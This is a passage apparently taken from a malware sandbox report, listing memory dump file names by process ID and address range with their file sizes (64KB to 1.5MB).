                                                                                                                                        1.5MB

                                                                                                                                      • memory/2812-681-0x0000000000400000-0x0000000000588000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1.5MB

                                                                                                                                      • memory/2864-196-0x00000000005F0000-0x0000000000602000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        72KB

                                                                                                                                      • memory/6004-40037-0x0000000000F00000-0x0000000000F10000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/6004-40036-0x0000000000F00000-0x0000000000F10000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/6004-41992-0x0000000001250000-0x000000000134E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1016KB

                                                                                                                                      • memory/6004-42331-0x0000000000F00000-0x0000000000F10000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/6004-42330-0x0000000000F00000-0x0000000000F10000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        64KB

                                                                                                                                      • memory/6004-39660-0x0000000001250000-0x000000000134E000-memory.dmp

                                                                                                                                        Filesize

                                                                                                                                        1016KB